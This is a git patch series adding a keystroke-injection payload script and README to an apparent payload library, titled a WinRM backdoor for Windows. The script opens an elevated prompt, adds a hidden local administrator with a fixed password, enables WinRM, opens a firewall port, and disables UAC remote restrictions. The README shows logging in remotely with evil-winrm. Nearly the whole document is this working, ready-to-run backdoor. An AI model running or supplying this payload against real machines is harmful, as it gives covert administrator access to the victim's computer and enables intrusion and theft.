From 49a8daf440b3d675838b71334321d1cd335efe31 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Tue, 9 Aug 2022 03:15:51 -0400 Subject: [PATCH 1/2] Add "Microsoft Windows" WinRM Backdoor 1) Adds a user account (OMG_User:OMG_P@ssW0rD). 2) Adds this local user to local administrator group. 3) Enables "Windows Remote Management" with default settings. 4) Adds a rule to the firewall. 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions. 6) Hides this user account. --- .../win_winrm-backdoor/README.md | 28 +++++++ .../win_winrm-backdoor/payload.txt | 79 +++++++++++++++++++ 2 files changed, 107 insertions(+) create mode 100644 payloads/library/remote_access/win_winrm-backdoor/README.md create mode 100644 payloads/library/remote_access/win_winrm-backdoor/payload.txt diff --git a/payloads/library/remote_access/win_winrm-backdoor/README.md b/payloads/library/remote_access/win_winrm-backdoor/README.md new file mode 100644 index 0000000..6e22914 --- /dev/null +++ b/payloads/library/remote_access/win_winrm-backdoor/README.md @@ -0,0 +1,28 @@ +# "Microsoft Windows" WinRM Backdoor + +- Title: "Microsoft Windows" WinRM Backdoor +- Author: TW-D +- Version: 1.0 +- Target: Microsoft Windows +- Category: Remote Access + +## Description + +1) Adds a user account (OMG_User:OMG_P@ssW0rD). +2) Adds this local user to local administrator group. +3) Enables "Windows Remote Management" with default settings. +4) Adds a rule to the firewall. +5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions. +6) Hides this user account. + +## Exploitation + +> +> The connection identifiers will be those defined by the values : **OMG_User** and **OMG_P@ssW0rD**. +> + +``` +hacker@hacker-computer:~$ evil-winrm --ip --user OMG_User --password 'OMG_P@ssW0rD' +*Evil-WinRM* PS C:\Users\OMG_User\Documents> whoami +desktop-xxxxxxx\omg_user +``` diff --git a/payloads/library/remote_access/win_winrm-backdoor/payload.txt b/payloads/library/remote_access/win_winrm-backdoor/payload.txt new file mode 100644 index 0000000..27604ef --- /dev/null +++ b/payloads/library/remote_access/win_winrm-backdoor/payload.txt @@ -0,0 +1,79 @@ +REM # +REM # Title: "Microsoft Windows" WinRM Backdoor +REM # +REM # Description: +REM # 1) Adds a user account (OMG_User:OMG_P@ssW0rD). +REM # 2) Adds this local user to local administrator group. +REM # 3) Enables "Windows Remote Management" with default settings. +REM # 4) Adds a rule to the firewall. +REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions. +REM # 6) Hides this user account. +REM # +REM # Author: TW-D +REM # Version: 1.0 +REM # Category: Remote Access +REM # Target: Microsoft Windows +REM # +REM # TESTED ON +REM # =============== +REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1) +REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1) +REM # +REM # REQUIREMENTS +REM # =============== +REM # The target user must belong to the 'Administrators' group. +REM # + +REM ######## INITIALIZATION ######## + +DELAY 1000 +DUCKY_LANG US +DELAY 1000 + +REM ######## STAGE1 ######## + +GUI r +DELAY 3000 +STRING cmd +DELAY 1000 +CTRL SHIFT ENTER +DELAY 3000 +LEFTARROW +DELAY 5000 +ENTER +DELAY 5000 + +REM ######## STAGE2 ######## + +STRING NET USER OMG_User OMG_P@ssW0rD /ADD +ENTER +DELAY 1500 + +STRING NET LOCALGROUP Administrators OMG_User /ADD +ENTER +DELAY 1500 + +REM ######## STAGE3 ######## + +STRING WINRM QUICKCONFIG +ENTER +DELAY 3000 + +STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN +ENTER +DELAY 1500 + +REM ######## STAGE4 ######## + +STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 +ENTER +DELAY 1500 + +STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0 +ENTER +DELAY 1500 + +REM ######## FINISH ######## + +STRING EXIT +ENTER From fd912a27ad3985fd647f0b847d26f581fe182229 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Tue, 9 Aug 2022 03:32:25 -0400 Subject: [PATCH 2/2] Update payload.txt --- payloads/library/remote_access/win_winrm-backdoor/payload.txt | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/payloads/library/remote_access/win_winrm-backdoor/payload.txt b/payloads/library/remote_access/win_winrm-backdoor/payload.txt index 27604ef..32bffcc 100644 --- a/payloads/library/remote_access/win_winrm-backdoor/payload.txt +++ b/payloads/library/remote_access/win_winrm-backdoor/payload.txt @@ -59,6 +59,10 @@ STRING WINRM QUICKCONFIG ENTER DELAY 3000 +STRING y +ENTER +DELAY 1500 + STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN ENTER DELAY 1500